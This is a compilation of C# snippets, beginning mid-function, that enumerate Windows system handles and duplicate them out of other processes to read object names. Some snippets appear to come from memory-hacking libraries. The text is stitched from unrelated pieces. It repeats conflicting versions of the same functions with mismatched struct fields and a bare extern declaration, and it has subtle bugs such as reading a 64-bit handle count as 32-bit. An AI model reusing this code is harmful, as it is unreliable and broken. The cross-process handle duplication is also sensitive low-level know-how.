shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (shHandle.ProcessID != BaseProcess.Id)
{
continue;
}
try
{
test.Add(shHandle);
}
catch
{
// ignored
}
}
foreach (var systemHandleInformation in test)
{
try
{
handles.Add(new NhaamaHandle(new IntPtr(systemHandleInformation.Handle), this));
}
catch
{
//ignored
}
}
return(handles.ToArray());
}
public static extern unsafe int ZwQuerySystemInformation(int SystemInformationClass, ref SYSTEM_HANDLE_INFORMATION SystemInformation, uint SystemInformationLength, ref uint ReturnLength);
/// <summary>
/// <para>Gets system handle information.</para>
/// <para>This is not a cheap call.</para>
/// </summary>
/// <returns>Managed Copy of a Windows SYSTEM_HANDLE_INFORMATION struct</returns>
public static SYSTEM_HANDLE_INFORMATION GetSystemHandleInformation()
{
var ntstatus = NTSTATUS.InfoLengthMismatch;
var cbbuf = 0x1000;
var buf = Marshal.AllocHGlobal(cbbuf);
try
{
var returnLength = 0;
while (ntstatus == NTSTATUS.InfoLengthMismatch)
{
cbbuf *= 2;
buf = Marshal.ReAllocHGlobal(buf, new IntPtr(cbbuf));
ntstatus = NtQuerySystemInformation(
SYSTEM_INFORMATION_CLASS.SystemHandleInformation,
buf,
cbbuf,
out returnLength);
}
if (ntstatus != NTSTATUS.Success)
{
Trace.WriteLine("ntstatus err code: " + ntstatus);
return new SYSTEM_HANDLE_INFORMATION
{
Count = 0,
Handles = new SYSTEM_HANDLE[0],
};
}
var systemHandleInformation = new SYSTEM_HANDLE_INFORMATION();
systemHandleInformation.Count = Marshal.ReadInt32(buf);
systemHandleInformation.Handles = new SYSTEM_HANDLE[systemHandleInformation.Count];
var sizeOfSystemHandleEntry = Marshal.SizeOf(typeof(SYSTEM_HANDLE));
for (int i = 0; i < systemHandleInformation.Count; i++)
{
IntPtr ptr = (buf + (4 + (i * sizeOfSystemHandleEntry)));
SYSTEM_HANDLE entry = (SYSTEM_HANDLE)Marshal.PtrToStructure(ptr, typeof(SYSTEM_HANDLE));
systemHandleInformation.Handles[i] = entry;
}
return systemHandleInformation;
}
finally
{
Marshal.FreeHGlobal(buf);
}
}
/// <summary>
/// Queries for name of handle.
/// </summary>
/// <param name="targetHandleInfo">The handle info.</param>
/// <param name="hProcess">Open handle to the process which owns that handle.</param>
/// <returns></returns>
private static string GetHandleName(SYSTEM_HANDLE_INFORMATION targetHandleInfo, IntPtr hProcess)
{
//skip special NamedPipe handle (this may cause hang up with NtQueryObject function)
if (targetHandleInfo.AccessMask.ToInt64() == 0x0012019F)
{
return String.Empty;
}
IntPtr thisProcess = Process.GetCurrentProcess().Handle;
IntPtr handle;
// Need to duplicate handle in this process to be able to access name
DuplicateHandle(hProcess, new IntPtr(targetHandleInfo.HandleValue), thisProcess,
out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS);
// Setup buffer to store unicode string
int bufferSize = GetHandleNameLength(handle);
// Allocate unmanaged memory to store name
IntPtr pStringBuffer = Marshal.AllocHGlobal(bufferSize);
// Query to fill string buffer with name
NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, pStringBuffer, bufferSize, out bufferSize);
// Close this handle
CloseHandle(handle); //super important... almost missed this
// Do the conversion to managed type
string handleName = ConvertToString(pStringBuffer);
// Release
Marshal.FreeHGlobal(pStringBuffer);
return handleName;
}
public static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process = null, string IN_strObjectTypeName = null, string IN_strObjectName = null)
{
int nHandleInfoSize = 0x10000;
IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
int nLength = 0;
while ((_ = NtQuerySystemInformation(16, ipHandlePointer, nHandleInfoSize, ref nLength)) == 0xC0000004)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
byte[] baTemp = new byte[nLength];
Marshal.Copy(ipHandlePointer, baTemp, 0, nLength);
IntPtr ipHandle;
long lHandleCount;
if (Is64Bits())
{
lHandleCount = Marshal.ReadInt64(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
SYSTEM_HANDLE_INFORMATION shHandle;
List <SYSTEM_HANDLE_INFORMATION> lstHandles = new List <SYSTEM_HANDLE_INFORMATION>();
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
shHandle = new SYSTEM_HANDLE_INFORMATION();
if (Is64Bits())
{
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (process != null)
{
if (shHandle.ProcessID != process.Id)
{
continue;
}
}
if (IN_strObjectTypeName != null)
{
var strObjectTypeName = GetObjectTypeName(shHandle, Process.GetProcessById(shHandle.ProcessID));
if (strObjectTypeName != IN_strObjectTypeName)
{
continue;
}
}
if (IN_strObjectName != null)
{
var strObjectName = GetObjectName(shHandle, Process.GetProcessById(shHandle.ProcessID));
if (string.IsNullOrEmpty(strObjectName) || !strObjectName.Contains(IN_strObjectName))
{
continue;
}
}
lstHandles.Add(shHandle);
}
return(lstHandles);
}
private static Device GetHandleName(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process, int count, int handleCount)
{
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
Device IDFound = null;
Int32 accessMask = (Int32)systemHandleInformation.AccessMask;
if (systemHandleInformation.ProcessID != process.Id ||
accessMask == 0x0012019f ||
accessMask == 0x001a019f ||
accessMask == 0x00120189 ||
accessMask == 0x00100000)
{
return(IDFound);
}
try
{
//Set up flags for and then get a process handle for the current process being checked
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, process.Id);
//Duplicate the process handle into ipHandle, if this fails return null
if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(IDFound);
}
int nLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024); //Allocate memory for a max length handle name
//Try to find out exactly how long the object name is, then once you've allocated the proper amount of memory, copy it into hObjectName
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (nLength == 0)
{
Console.WriteLine("Length returned at zero!");
return(IDFound);
}
hObjectName = Marshal.AllocHGlobal(nLength);
}
//Move the infromation in hObjectName to an easier to use structure OBJECT_NAME_INFORMATION
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName);
//Check if we have a proper name
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
//Convert objObjectName to a normal string, this is the handle's name
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
bool deviceIDFound = false;
//Check the handle name for if it contains anything releveant (in this case it's checking for a device ID) if it does, return it
foreach (Device device in deviceList)
{
if (strObjectName.ToLower().Contains(device.PNPDeviceIDSubstring.ToLower()))
{
IDFound = device;
deviceIDFound = true;
}
}
if (deviceIDFound)
{
//Console.WriteLine("Handle matched!!!\n\n\nProcess Name: " + process.ProcessName + "strObjectName: " + strObjectName + "\nid: " + IDFound + "\n\n\n");
}
else
{
//If it doesnt, return null
//Console.WriteLine("(" + count + " / " + handleCount + "): " + strObjectName);
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
//Clean up managed memory
Marshal.FreeHGlobal(hObjectName);
CloseHandle(ipHandle);
CloseHandle(openProcessHandle);
}
return(IDFound);
}
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
var m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id);
var objBasic = new OBJECT_BASIC_INFORMATION();
var objObjectName = new OBJECT_NAME_INFORMATION();
int nLength = 0;
if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(),
out IntPtr ipHandle, 0, false, 0x2))
{
return(null);
}
var ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
nLength = objBasic.NameInformationLength;
IntPtr ipObjectName = Marshal.AllocHGlobal(nLength);
while ((uint)(_ = NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectNameInformation,
ipObjectName, nLength, ref nLength))
== 0xC0000004)
{
Marshal.FreeHGlobal(ipObjectName);
ipObjectName = Marshal.AllocHGlobal(nLength);
}
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType());
IntPtr ipTemp;
if (Is64Bits())
{
ipTemp = new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32);
}
else
{
ipTemp = objObjectName.Name.Buffer;
}
if (ipTemp != IntPtr.Zero)
{
byte[] baTemp2 = new byte[nLength];
try
{
Marshal.Copy(ipTemp, baTemp2, 0, nLength);
string strObjectName = Marshal.PtrToStringUni(Is64Bits() ?
new IntPtr(ipTemp.ToInt64()) :
new IntPtr(ipTemp.ToInt32()));
return(strObjectName);
}
catch (AccessViolationException)
{
return(null);
}
finally
{
Marshal.FreeHGlobal(ipObjectName);
CloseHandle(ipHandle);
}
}
return(null);
}
static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process, int?type)
{
uint nStatus;
int nHandleInfoSize = 0x10000;
IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
int nLength = 0;
IntPtr ipHandle = IntPtr.Zero;
List <SYSTEM_HANDLE_INFORMATION> lstHandles = new List <SYSTEM_HANDLE_INFORMATION>();
while ((nStatus = NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
if (nStatus != 0)
{
Console.WriteLine($"[!] Failed to query handle information with error 0x{nStatus:x}");
return(lstHandles);
}
byte[] baTemp = new byte[nLength];
CopyMemory(baTemp, ipHandlePointer, (uint)nLength);
long lHandleCount = 0;
if (Is64Bits())
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
SYSTEM_HANDLE_INFORMATION shHandle;
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
shHandle = new SYSTEM_HANDLE_INFORMATION();
if (Is64Bits())
{
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (shHandle.ProcessID != process.Id)
{
continue;
}
if (!type.HasValue)
{
lstHandles.Add(shHandle);
}
else if (type.Value == shHandle.ObjectTypeNumber)
{
lstHandles.Add(shHandle);
}
}
return(lstHandles);
}
public static List <HandleInformation> GetHandlesByType(string strHandleType = "Directory")
{
uint nStatus;
var nHandleInfoSize = 0x10000;
var ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
var nLength = 0;
var ipHandle = IntPtr.Zero;
while ((nStatus = Native.NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer,
nHandleInfoSize, ref nLength)) ==
STATUS_INFO_LENGTH_MISMATCH)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
var baTemp = new byte[nLength];
Marshal.Copy(ipHandlePointer, baTemp, 0, nLength);
long lHandleCount = 0;
if (Is64Bits())
{
lHandleCount = Marshal.ReadInt64(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
List <HandleInformation> toReturn = new List <HandleInformation>();
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
var shHandle = new SYSTEM_HANDLE_INFORMATION();
var realInfo = new HandleInformation();
if (Is64Bits())
{
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (MiniMem.AttachedProcess.ProcessObject != null)
{
if (shHandle.ProcessID != MiniMem.AttachedProcess.ProcessObject.Id)
{
continue;
}
}
if (strHandleType != null)
{
var strObjectTypeName = getObjectTypeName(shHandle, Process.GetProcessById(shHandle.ProcessID));
if (strObjectTypeName != strHandleType)
{
continue;
}
}
realInfo.HandleName = getObjectName(shHandle, Process.GetProcessById(shHandle.ProcessID));
realInfo.Advanced = shHandle;
if (realInfo.HandleName == null)
{
continue;
}
toReturn.Add(realInfo);
}
return(toReturn);
}
